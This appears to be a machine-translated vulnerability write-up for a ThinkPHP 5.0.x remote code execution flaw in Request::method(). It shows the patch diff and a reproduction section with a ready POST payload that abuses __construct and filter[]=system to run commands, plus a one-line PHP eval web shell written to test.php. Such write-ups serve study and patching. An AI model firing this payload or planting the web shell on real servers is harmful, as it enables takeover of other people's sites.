One 、 Vulnerability profile

5.0.23 In previous versions , obtain method The method name is not handled correctly in the method of , Causes an attacker to call Request Class any method and construct the utilization chain , This leads to a Remote Code Execution Vulnerability .
Thinkphp Source download

The vulnerability code is as follows ：

@@ -522,8 +522,11 @@ public function method($method = false)
            return $this->server('REQUEST_METHOD') ?: 'GET';
        } elseif (!$this->method) {
    
            if (isset($_POST[Config::get('var_method')])) {
    
                $this->method = strtoupper($_POST[Config::get('var_method')]);
                $this->{
    $this->method}($_POST);
                $method = strtoupper($_POST[Config::get('var_method')]);
                if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {
    
                    $this->method = $method;
                    $this->{
    $this->method}($_POST);
                }
            } elseif (isset($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'])) {
    
                $this->method = strtoupper($_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE']);
            } else {
    

call $this->{$this->method}($_POST); sentence . When we can control $method The value of , You can call Request Class , When the constructor is called __construct() when , Can be covered Request Any member variable of a class , You can override $this->method, Appoint check() Methods $method value .

Two 、 Loophole recurrence

visit IP:8080 Grab the bag
Change request to POST /index.php?s=captcha
Message body is ：_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=command
commond=id/ls/whoami/ echo <?php eval($_POST['cmd']);?> > test.php